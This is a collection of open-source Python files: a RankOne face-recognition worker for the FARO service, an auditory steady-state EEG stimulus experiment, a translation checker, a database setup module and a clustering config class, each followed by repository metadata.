if self.min_face_size != 'adaptive_size':
roc.roc_represent(im, self.algorithm_id_detect, self.min_face_size, self.num_faces, self.detection_threshold, self.img_quality, templates)
else:
            roc.roc_represent(im, self.algorithm_id_detect, roc.size_t_value(adaptive_minimum_size), self.num_faces, self.detection_threshold, self.img_quality, templates)
roc.delete_size_t(adaptive_minimum_size)
        # Handle the missing-detection case. (There is no need to special-case "best"
        # mode here.) If the first slot holds no valid detection, create a template
        # manually: set a bounding box covering the whole image and re-run
        # roc_represent with ROC_MANUAL.
curr_template = roc.roc_template_array_getitem(templates, 0)
if (curr_template.algorithm_id == 0 or curr_template.algorithm_id & roc.ROC_INVALID):
curr_template.detection.x = int(w * 0.5)
curr_template.detection.y = int(h * 0.5)
curr_template.detection.width = w
curr_template.detection.height = h
roc.roc_template_array_setitem(templates,0,curr_template)
roc.roc_represent(im, roc.ROC_MANUAL, self.min_face_size, 1, self.detection_threshold, self.img_quality, templates)
roc.roc_free_image(im)
return templates
def detect(self,img,face_records,options):
detected_templates = self._detect(img,options)
for i in range(0,self.num_faces):
curr_template = roc.roc_template_array_getitem(detected_templates, i)
if curr_template.algorithm_id & roc.ROC_INVALID or curr_template.algorithm_id == 0:
continue
else:
face_record = face_records.face_records.add()
face_record.detection.score = curr_template.detection.confidence
xc, yc, w, h = curr_template.detection.x, curr_template.detection.y, curr_template.detection.width, curr_template.detection.height
x = int(xc - (w*0.5))
                y = int(yc - (h*0.5))
face_record.detection.location.CopyFrom(pt.rect_val2proto(x, y, w, h))
face_record.detection.detection_id = i
face_record.detection.detection_class = "FACE"
face_record.template.buffer = self._rocFlatten(curr_template)
#Free all the roc stuff
for i in range(0,self.num_faces):
roc.roc_free_template(roc.roc_template_array_getitem(detected_templates,i))
def extract(self, img, face_records):
if isinstance(img,np.ndarray):
im = self._converttoRocImage(img)
for face_record in face_records.face_records:
template_dst = roc.roc_template()
self._rocUnFlatten(face_record.template.buffer, template_dst)
roc.roc_represent(im, self.algorithm_id_extract, self.recommendedMinFaceSize(), 1, self.recommendedDetectionThreshold(), self.recommendedImgQuality(), template_dst)
if template_dst.algorithm_id & roc.ROC_INVALID or template_dst.algorithm_id == 0:
continue
else:
xc, yc, w, h = template_dst.detection.x, template_dst.detection.y, template_dst.detection.width, template_dst.detection.height
x = int(xc - (w*0.5))
                y = int(yc - (h*0.5))
                assert (face_record.detection.location.x == x), "Extraction bounding box must match the detection bounding box"
                assert (face_record.detection.location.y == y), "Extraction bounding box must match the detection bounding box"
                assert (face_record.detection.location.width == w), "Extraction bounding box must match the detection bounding box"
                assert (face_record.detection.location.height == h), "Extraction bounding box must match the detection bounding box"
                '''
                Default metadata fields: ChinX, ChinY, IOD (inter-ocular distance), LeftEyeX, LeftEyeY,
                NoseRootX, NoseRootY, Path, Pose, Quality, RightEyeX, RightEyeY, Roll
                '''
metadata_info = json.loads(template_dst.md.decode('utf-8'))
landmark = face_record.landmarks.add()
landmark.landmark_id = 'Nose'
landmark.location.x = metadata_info['NoseRootX']
landmark.location.y = metadata_info['NoseRootY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'LeftEye'
landmark.location.x = metadata_info['LeftEyeX']
landmark.location.y = metadata_info['LeftEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'RightEye'
landmark.location.x = metadata_info['RightEyeX']
landmark.location.y = metadata_info['RightEyeY']
landmark = face_record.landmarks.add()
                landmark.landmark_id = 'Chin'
landmark.location.x = metadata_info['ChinX']
landmark.location.y = metadata_info['ChinY']
demographic = face_record.attributes.add()
demographic.key = 'Age'
demographic.text = str(metadata_info['Age'])
demographic = face_record.attributes.add()
demographic.key = 'Gender'
demographic.text = metadata_info['Gender']
demographic = face_record.attributes.add()
demographic.key = 'GeographicOrigin'
demographic.text = metadata_info['GeographicOrigin']
demographic = face_record.attributes.add()
demographic.key = 'Emotion'
demographic.text = metadata_info['Emotion']
demographic = face_record.attributes.add()
demographic.key = 'Artwork'
demographic.text = metadata_info['Artwork']
demographic = face_record.attributes.add()
demographic.key = 'Yaw'
demographic.text = str(metadata_info['Yaw'])
face_record.template.buffer = self._rocFlatten(template_dst)
roc.roc_ensure(roc.roc_free_template(template_dst))
def locate(self,img,face_records,options):
        '''
        Not needed: the eye, nose, and chin locations are found during template
        extraction and added to the face records there.
        '''
pass
def align(self,image,face_records):
'''Align the images to a standard size and orientation to allow
recognition.'''
pass # Not needed for this algorithm.
def scoreType(self):
'''Return the method used to create a score from the template.
By default server computation is required.
SCORE_L1, SCORE_L2, SCORE_DOT, SCORE_SERVER
'''
return fsd.SERVER
def score(self,score_request):
'''Compare templates to produce scores.'''
score_type = self.scoreType()
result = geo.Matrix()
# Check that this is a known score type
if score_type not in [fsd.SERVER]:
raise NotImplementedError("Score type <%s> not implemented."%(score_type,))
# Check to make sure the probe and gallery records are correct
if len(score_request.template_probes.templates) == 0:
raise ValueError("no probe templates were found in the arguments.")
if len(score_request.template_gallery.templates) == 0:
raise ValueError("no gallery templates were found in the arguments.")
        # This check is not necessary because we always copy the templates and never
        # use the face records directly; refer to the corresponding function in FaceClient.py.
'''
if min(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) != 0:
raise ValueError("probes argument cannot have both face_probes and template_probes defined.")
if max(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) == 0:
raise ValueError("no probe templates were found in the arguments.")
if min(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) != 0:
raise ValueError("gallery argument cannot have both face_gallery and template_gallery defined.")
if max(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) == 0:
raise ValueError("no gallery templates were found in the arguments.")
'''
        # This is a first, straightforward approach to computing similarity scores and is
        # not the fastest. It is also memory-bound: the whole similarity matrix must be
        # held in memory, which can be a problem for large datasets.
if score_type == fsd.SERVER:
#rows = probe images
#cols = gallery images
sim_mat = np.zeros((len(score_request.template_probes.templates),len(score_request.template_gallery.templates)),dtype=np.float32)
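            # Rough sizing note: this float32 matrix alone takes 4 * n_probes * n_gallery
            # bytes, e.g. roughly 400 MB for 10,000 x 10,000 templates.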
roc_probe_template = roc.roc_template()
roc_gallery_template = roc.roc_template()
#roc_gallery_template_array = roc.new_roc_template_array(len(score_request.template_gallery.templates))
sm_metric = roc.new_roc_similarity()
for p in range(0,len(score_request.template_probes.templates)):
self._rocUnFlatten(score_request.template_probes.templates[p].buffer,roc_probe_template)
#print roc_probe_template
for g in range(0,len(score_request.template_gallery.templates)):
#print(p,g)
#if p == 0:
# roc_gallery_template = roc.roc_template()
# self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
# roc.roc_template_array_setitem(roc_gallery_template_array,g,roc_gallery_template)
#roc_gallery_template = roc.roc_template()
self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
#roc.roc_compare_templates(roc_probe_template, roc.roc_template_array_getitem(roc_gallery_template_array,g), sm_metric)
roc.roc_compare_templates(roc_probe_template, roc_gallery_template, sm_metric)
sim_mat[p,g] = roc.roc_similarity_value(sm_metric)
#roc.roc_free_template(roc_gallery_template)
roc.delete_roc_similarity(sm_metric)
roc.roc_free_template(roc_probe_template)
roc.roc_free_template(roc_gallery_template)
#for i in range(len(score_request.template_gallery.templates)):
#print(i)
# roc.roc_ensure(roc.roc_free_template(roc.roc_template_array_getitem(roc_gallery_template_array, i)))
else:
            raise NotImplementedError("ScoreType %s is not implemented."%(score_type,))
        # RankOne returns a similarity score of -1 when a comparison involves an invalid
        # template, so replace all -1 entries in the matrix with 0.
        sim_mat[sim_mat == -1.0] = 0.0
        # Convert the similarity matrix to a distance matrix by subtracting it from 1.
dist_mat = 1.0 - sim_mat
# Return the result
return pt.matrix_np2proto(dist_mat)
def status(self):
'''Return a simple status message.'''
print("Handeling status request.")
status_message = fsd.FaceServiceInfo()
status_message.status = fsd.READY
status_message.detection_support = True
status_message.extract_support = True
status_message.score_support = False
status_message.score_type = self.scoreType()
        status_message.algorithm = "RankOne_%s" % (roc.__file__)
status_message.detection_threshold = self.recommendedDetectionThreshold()
status_message.match_threshold = self.recommendedScoreThreshold()
return status_message
def recommendedImgQuality(self):
return roc.ROC_SUGGESTED_MIN_QUALITY
def recommendedDetectionThreshold(self):
'''
The false_detection_rate parameter specifies the allowable
false positive rate for face detection.The suggested default
value for false_detection_rate is 0.02 which corresponds to
one false detection in 50 images on the FDDB benchmark. A
higher false detection rate will correctly detect more faces
at the cost of also incorrectly detecting more non-faces.
        The accepted range of values for false_detection_rate is
        between 0 and 1. Values outside this range are automatically
        clamped to those bounds.
'''
return 0.02
def recommendedMaxFacesDetected(self):
return 10
def recommendedMinFaceSize(self):
return 32
def recommendedScoreThreshold(self,far=-1):
        '''Return a recommended score threshold.
        DLIB recommends a value of 0.6 for the LFW dataset; the same default is
        used here.
        '''
return 0.60
def cleanexit(self):
print('ROC SDK Deinitialized')
roc.roc_finalize()
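# Typical lifecycle sketch (illustrative only; option names mirror getOptionsGroup
# above, and the protobuf containers for face_records / score_request come from
# faro.proto.face_service_pb2 and are normally constructed by the FARO service layer):
#
#   worker = RankOneFaceWorker(options)
#   worker.detect(img, face_records, options)   # fills detections and raw templates
#   worker.extract(img, face_records)           # adds landmarks, demographics, etc.
#   dist = worker.score(score_request)          # server-side distance matrix
#   worker.cleanexit()                          # releases the ROC SDK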
| 44.027897 | 331 | 0.640347 | [
"MIT"
] | ORNL/faro | src/faro/face_workers/RankOneFaceWorker.py | 20,517 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from locales import Locales
print("content-type:text/html\n\n")
locales_obj = Locales('en')
print(locales_obj.get_missing_translations())
| 18.8 | 45 | 0.723404 | [
"MIT"
] | letztes/achtelbass2web | get_missing_translations.py | 188 | Python |
"""
Generate Steady-State Auditory Evoked Potential (SSAEP)
=======================================================
Steady-State Auditory Evoked Potential (SSAEP) - also known as Auditory
Steady-State Response (ASSR) - stimulus presentation.
"""
from time import time
import numpy as np
from pandas import DataFrame
from psychopy import visual, core, event, sound
from scipy import stats
__title__ = "Auditory SSAEP (orig)"
def present(
save_fn: str,
duration=120,
n_trials=2010,
iti=0.5,
soa=3.0,
jitter=0.2,
volume=0.8,
random_state=42,
eeg=None,
cf1=900,
amf1=45,
cf2=770,
amf2=40.018,
sample_rate=44100,
):
"""
Auditory SSAEP Experiment
===========================
Parameters:
-----------
duration - duration of the recording in seconds (default 10)
n_trials - number of trials (default 10)
iti - intertrial interval (default 0.3)
soa - stimulus onset asynchrony, = interval between end of stimulus
and next trial (default 0.2)
jitter - jitter in the intertrial intervals (default 0.2)
secs - duration of the sound in seconds (default 0.2)
volume - volume of the sounds in [0,1] (default 0.8)
random_state - random seed (default 42)
"""
# Set up trial parameters
np.random.seed(random_state)
markernames = [1, 2]
record_duration = np.float32(duration)
# Initialize stimuli
am1 = generate_am_waveform(cf1, amf1, secs=soa, sample_rate=sample_rate)
am2 = generate_am_waveform(cf2, amf2, secs=soa, sample_rate=sample_rate)
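    # The two tones are tagged at different modulation rates (900 Hz carrier AM at
    # 45 Hz vs. 770 Hz carrier AM at ~40 Hz by default) so that their steady-state
    # responses can be separated in the EEG spectrum.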
aud1 = sound.Sound(am1, sampleRate=sample_rate)
aud1.setVolume(volume)
aud2 = sound.Sound(am2, sampleRate=sample_rate)
aud2.setVolume(volume)
auds = [aud1, aud2]
# Set up trial list
stim_freq = np.random.binomial(1, 0.5, n_trials)
itis = iti + np.random.rand(n_trials) * jitter
trials = DataFrame(dict(stim_freq=stim_freq, timestamp=np.zeros(n_trials)))
trials["iti"] = itis
trials["soa"] = soa
# Setup graphics
mywin = visual.Window(
[1920, 1080], monitor="testMonitor", units="deg", fullscr=True
)
fixation = visual.GratingStim(win=mywin, size=0.2, pos=[0, 0], sf=0, rgb=[1, 0, 0])
fixation.setAutoDraw(True)
mywin.flip()
# Show the instructions screen
show_instructions(10)
# Start EEG Stream, wait for signal to settle, and then pull timestamp for start point
if eeg:
eeg.start(save_fn, duration=record_duration)
start = time()
# Iterate through the events
for ii, trial in trials.iterrows():
# Intertrial interval
core.wait(trial["iti"] + np.random.randn() * jitter)
# Select stimulus frequency
ind = trials["stim_freq"].iloc[ii]
auds[ind].stop()
auds[ind].play()
# Push sample
if eeg:
timestamp = time()
if eeg.backend == "muselsl":
marker = [markernames[ind]]
marker = list(map(int, marker))
else:
marker = markernames[ind]
eeg.push_sample(marker=marker, timestamp=timestamp)
mywin.flip()
# Offset
core.wait(soa)
if len(event.getKeys()) > 0:
break
if (time() - start) > record_duration:
break
event.clearEvents()
# Cleanup
if eeg:
eeg.stop()
mywin.close()
def show_instructions(duration):
instruction_text = """
    Welcome to the SSAEP experiment!
Stay still, focus on the centre of the screen, and try not to blink.
This block will run for %s seconds.
Press spacebar to continue.
"""
instruction_text = instruction_text % duration
# graphics
mywin = visual.Window([1600, 900], monitor="testMonitor", units="deg", fullscr=True)
mywin.mouseVisible = False
# Instructions
text = visual.TextStim(win=mywin, text=instruction_text, color=[-1, -1, -1])
text.draw()
mywin.flip()
event.waitKeys(keyList="space")
mywin.mouseVisible = True
mywin.close()
def generate_am_waveform(
carrier_freq,
am_freq,
secs=1,
sample_rate=None,
am_type="gaussian",
gaussian_std_ratio=8,
):
"""Generate an amplitude-modulated waveform.
Generate a sine wave amplitude-modulated by a second sine wave or a
Gaussian envelope with standard deviation = period_AM/8.
Args:
carrier_freq (float): carrier wave frequency, in Hz
am_freq (float): amplitude modulation frequency, in Hz
Keyword Args:
secs (float): duration of the stimulus, in seconds
sample_rate (float): sampling rate of the sound, in Hz
am_type (str): amplitude-modulation type
'gaussian' -> Gaussian with std defined by `gaussian_std`
'sine' -> sine wave
gaussian_std_ratio (float): only used if `am_type` is 'gaussian'.
Ratio between AM period and std of the Gaussian envelope. E.g.,
            gaussian_std_ratio = 8 means the Gaussian window has 8 standard
deviations around its mean inside one AM period.
Returns:
(numpy.ndarray): sound samples
"""
t = np.arange(0, secs, 1.0 / sample_rate)
if am_type == "gaussian":
period = int(sample_rate / am_freq)
std = period / gaussian_std_ratio
norm_window = stats.norm.pdf(np.arange(period), period / 2, std)
norm_window /= np.max(norm_window)
n_windows = int(np.ceil(secs * am_freq))
am = np.tile(norm_window, n_windows)
am = am[: len(t)]
elif am_type == "sine":
am = np.sin(2 * np.pi * am_freq * t)
carrier = 0.5 * np.sin(2 * np.pi * carrier_freq * t) + 0.5
am_out = carrier * am
return am_out
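# Minimal offline self-check (a sketch added for illustration; it only exercises
# generate_am_waveform() and does not open a PsychoPy window or touch an EEG device):
if __name__ == "__main__":
    _sr = 44100
    _wave = generate_am_waveform(900, 45, secs=3.0, sample_rate=_sr)
    print("samples:", len(_wave))                           # 3.0 s * 44100 Hz = 132300
    print("peak amplitude:", float(np.max(np.abs(_wave))))  # bounded by 1.0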
| 25.923767 | 90 | 0.619962 | [
"BSD-3-Clause"
] | Neuroelektroteknia/eeg-notebooks | eegnb/experiments/auditory_ssaep/ssaep.py | 5,781 | Python |
import sqlalchemy
from databases import Database
DATABASE_URL = "sqlite:///sampleSQlite.db"
database = Database(DATABASE_URL)
sqlalchemy_engine = sqlalchemy.create_engine(DATABASE_URL)
def get_database() -> Database:
return database
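# Example wiring (a minimal sketch, not part of this module; the FastAPI app and
# endpoint below are illustrative assumptions):
#
#   from fastapi import Depends, FastAPI
#   from databases import Database
#
#   app = FastAPI()
#
#   @app.on_event("startup")
#   async def startup():
#       await database.connect()
#
#   @app.on_event("shutdown")
#   async def shutdown():
#       await database.disconnect()
#
#   @app.get("/health")
#   async def health(db: Database = Depends(get_database)):
#       return {"status": "ok"}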
| 21.818182 | 58 | 0.8 | [
"MIT"
] | spideynolove/Other-repo | backend/fastapi/build_dsApp/Databases/sqlalchemy/database.py | 240 | Python |
import os
from ml_serving import Config as ServingConfig
class ClusteringConfig(ServingConfig):
min_cluster_size: int
cosine_thrsh: float
def __init__(self, **kwargs):
super().__init__()
for arg, dtype in self.__class__.__annotations__.items():
if arg in kwargs:
setattr(self, arg, dtype(kwargs[arg]))
else:
setattr(self, arg, dtype(os.environ[arg.upper()])) | 31.714286 | 66 | 0.630631 | [
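# Example usage (a sketch; assumes ml_serving.Config needs no extra constructor
# arguments and that MIN_CLUSTER_SIZE / COSINE_THRSH are exported in the environment
# when the corresponding kwargs are omitted):
#
#   cfg = ClusteringConfig(min_cluster_size=15, cosine_thrsh=0.75)
#   cfg = ClusteringConfig()   # falls back to the environment variables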
"MIT"
] | gasparian/ml-serving-template | producers/short-texts-clustering/src/clustering/config.py | 444 | Python |